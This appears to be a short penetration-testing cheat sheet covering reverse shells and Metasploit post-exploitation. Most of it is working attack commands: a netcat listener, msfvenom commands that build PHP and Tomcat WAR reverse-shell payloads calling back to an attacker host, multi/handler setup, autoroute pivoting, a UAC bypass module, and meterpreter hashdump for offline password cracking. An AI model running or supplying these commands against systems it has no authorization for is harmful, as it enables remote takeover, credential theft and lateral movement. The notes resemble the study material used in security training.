Reverse Connection & Exploitation
Netcat
Basic Netcat Command
nc -lnvp <port> [In the Attacker Machine]
Metasploit
Generate PHP reverse shell [msfvenom]
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.0.1 lport=4444 -o meterpreter.php
$ msfconsole
msf5> use exploit/multi/handler
msf5 exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf5 exploit(handler)> set payload php/meterpreter_reverse_tcp
msf5 exploit(handler)> set lhost 192.168.0.1
msf5 exploit(handler)> set lport 4444
msf5 exploit(handler)> exploit
Add routing protocols in msfconsole
meterpreter> run autoroute -s 172.16.50.0/24
Use SSH Bruteforce in msfconsole
View Active sessions
Using sessions command
Interact with sessions using
sessions -i <number>
Background a shell using meterpreter> background command
Note that in modern Windows operating systems, the User Account Control (UAC) policy prevents privilege escalation.
Bypassing UAC
You can bypass that restriction by using the bypassuac module.
Dumping the Password Database
For example, you can dump the password database and save it for an offline cracking session. The hashdump module dumps the password database of a Windows machine.
meterpreter > hashdump
msfvenom
Generate .war file for Apache Tomcat reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.64.10 LPORT=4444 -f war > reverse.war
Collection of Reverse shell [Commands]
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md